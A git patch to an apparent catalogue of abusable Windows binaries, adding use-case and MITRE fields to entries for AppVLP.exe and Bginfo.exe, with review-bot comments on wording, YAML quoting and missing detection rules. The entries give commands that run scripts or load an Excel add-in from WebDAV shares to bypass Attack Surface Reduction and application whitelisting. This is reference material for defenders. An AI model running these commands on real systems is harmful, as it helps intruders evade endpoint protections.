From 95dc80b8cd8238b08d75217d251a012217140bf2 Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Tue, 18 Sep 2018 23:06:22 -0400 Subject: [PATCH] Updated yml for: appvlp and bginfo. --- yml/OtherMSBinaries/Appvlp.yml | 9 ++++++--- yml/OtherMSBinaries/Bginfo.yml | 27 +++++++++++++++++++++++---- 2 files changed, 29 insertions(+), 7 deletions(-) diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index b886119..1e17096 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -5,6 +5,7 @@ Author: '' Created: '2018-05-25' Commands: - Command: AppVLP.exe \\webdav\calc.bat + Usecase: Execution of BAT file hosted on Webdav server. Description: Executes calc.bat through AppVLP.exe Categories: ['Execution', 'ASR Bypass'] Privileges: User @@ -12,6 +13,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" + Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Categories: ['Execution', 'ASR Bypass'] Privileges: User @@ -19,6 +21,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows 10 w/Office 2016 - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" + Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Categories: ['Execution', 'ASR Bypass'] Privileges: User 
@@ -37,8 +40,8 @@ Resources: - https://securityboulevard.com/2018/07/attackers-test-new-document-attack-vector-that-slips-past-office-defenses/ Acknowledgement: - Person: fab - Handle: @0rbz_ + Handle: '@0rbz_' - Person: Will - Handle: @moo_hax + Handle: '@moo_hax' - Person: Matt Wilson - Handle: @enigma0x3 + Handle: '@enigma0x3' diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 8b00538..feba596 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml 
@@ -1,20 +1,39 @@ --- Name: Bginfo.exe -Description: Execute -Author: '' +Description: Background Information Utility included with SysInternals Suite +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. + Usecase: Local execution of VBScript + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' + Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' + Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. + Categories: ['Execution', 'AWL Bypass'] + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows Full Path: - No fixed path Code Sample: [] Detection: [] Resources: - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ -Notes: Thanks to Oddvar Moe - @oddvarmoe +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe'
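Review bot: In the Appvlp.yml hunk at `@@ -12,6 +13,7 @@`, the context line directly under the new `Usecase:` reads "Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command."; since this PR already touches that command block, correct the verb agreement to "and runs the respective PS command" (the same sentence recurs in the next hunk).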
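Review bot: In the Appvlp.yml hunk at `@@ -19,6 +21,7 @@`, the added `Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).` is a verbatim copy of the Usecase added in the previous hunk, but the command here is different: it calls `RegisterXLL('\\webdav\xll_poc.xll')`, i.e. it loads an XLL from a WebDAV share rather than launching a local process. The Usecase should describe that distinct behaviour (loading an Excel add-in from a remote WebDAV path via AppVLP.exe) so the two entries are distinguishable when the YAML is rendered or searched.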
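Review bot: The Acknowledgement hunk at `@@ -37,8 +40,8 @@` in Appvlp.yml is a correct fix: `@` is a reserved indicator in YAML and cannot start a plain scalar, so the unquoted `Handle: @0rbz_`, `Handle: @moo_hax` and `Handle: @enigma0x3` values would fail to parse; wrapping them as `'@0rbz_'` etc. resolves that. The new Bginfo.yml acknowledgement uses the same quoting (`Handle: '@oddvarmoe'`), so the two files are now consistent.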
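Review bot: In the Bginfo.yml hunk at `@@ -1,20 +1,39 @@`, three things should be tightened before merge. First, the context line `Description: This style of execution may not longer work due to patch.` is ungrammatical and does not say which patch; change it to "may no longer work" and name the fix or point at the oddvar.moe resource already listed, since the new `Usecase: Remote execution of VBScript` added above it otherwise presents an apparently dead technique as a live one. Second, the new `OperatingSystem: Windows` lines are less specific than the `Windows 10 w/Office 2016` used in Appvlp.yml; record the version the commands were actually tested on. Third, `Detection: []` is still empty even though each command now carries `Categories: ['Execution', 'AWL Bypass']` and `MitreID: T1218`; the visible commands already give defenders concrete indicators (bginfo.exe launched with `/popup /nolicprompt`, bginfo.exe or its .bgi file loaded from a UNC/WebDAV path such as `\\10.10.10.10\webdav\` or `\\live.sysinternals.com\Tools\`), so at least a process-creation entry based on those should be added rather than leaving the field empty.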